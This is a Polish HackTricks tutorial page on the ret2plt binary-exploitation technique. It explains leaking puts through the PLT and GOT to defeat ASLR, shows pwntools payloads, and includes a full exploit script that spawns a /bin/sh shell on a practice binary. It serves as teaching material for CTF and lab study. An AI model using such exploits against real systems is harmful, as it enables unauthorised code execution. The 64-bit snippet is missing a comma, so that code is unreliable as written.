Ret2plt

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
Zdobądź oficjalne gadżety PEASS & HackTricks
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.

Podstawowe informacje

Celem tej techniki byłoby wyciek adresu funkcji z PLT, aby móc ominąć ASLR. Dzieje się tak dlatego, że jeśli na przykład wycieka adres funkcji puts z biblioteki libc, można wtedy obliczyć, gdzie znajduje się baza libc i obliczyć przesunięcia, aby uzyskać dostęp do innych funkcji, takich jak system.

Można to zrobić za pomocą ładunku pwntools, na przykład (stąd):

# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

Zauważ, jak puts (korzystając z adresu z PLT) jest wywoływane z adresem puts znajdującym się w GOT (Global Offset Table). Dzieje się tak dlatego, że w momencie, gdy puts drukuje wpis GOT puts, ten wpis będzie zawierał dokładny adres puts w pamięci.

Zauważ również, jak adres main jest używany w eksploacie, dzięki czemu po zakończeniu wykonania puts, binarny ponownie wywołuje main zamiast zakończyć działanie (dzięki czemu wyciekły adres będzie nadal ważny).

Zauważ, że aby to działało, binarny nie może być skompilowany z opcją PIE lub musisz znaleźć wyciek, aby ominąć PIE i poznać adresy PLT, GOT i main. W przeciwnym razie najpierw musisz ominąć PIE.

Możesz znaleźć pełny przykład tego bypassu tutaj. To był ostateczny exploit z tego przykładu:

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

Inne przykłady i odnośniki

https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
64 bity, włączony ASLR, ale brak PIE, pierwszym krokiem jest przepełnienie aż do bajtu 0x00 canary, a następnie wywołanie puts, aby go wyciec. Z canary tworzony jest gadget ROP do wywołania puts w celu wycieku adresu puts z GOT, a następnie gadget ROP do wywołania system('/bin/sh').
https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
64 bity, włączony ASLR, brak canary, przepełnienie stosu w funkcji głównej z funkcji potomnej. Gadget ROP do wywołania puts w celu wycieku adresu puts z GOT, a następnie wywołanie jednego gadgeta.

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
Zdobądź oficjalne gadżety PEASS & HackTricks
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.

PreviousASLR NextRet2ret & Reo2pop

Last updated 1 month ago